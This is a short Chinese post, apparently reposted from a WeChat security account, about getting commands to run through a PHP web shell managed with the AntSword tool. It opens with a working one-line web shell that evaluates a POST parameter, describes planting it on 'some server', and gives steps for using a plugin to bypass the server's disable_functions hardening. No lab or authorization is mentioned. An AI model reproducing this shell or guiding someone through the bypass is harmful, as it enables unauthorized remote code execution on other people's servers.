<?php @eval($_POST['knight']);?>
我将此木马放到某服务器,antsword打开终端后发现输入什么命令都显示ret=127
这说明disable_functions生效
查看PHPINFO:
<?php phpinfo();?>
发现关了很多的函数
我尝试使用专用的bypass工具去绕过:
https://github.com/Medicean/as_bypass_php_disable_functions
下载后放到此目录并进入antsword插件市场,加载插件。
选择合适的模式并点击开始。
成功。
原文始发于微信公众号(隼目安全):【相关分享】关于AntSword终端显示ret=127的解决方案
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论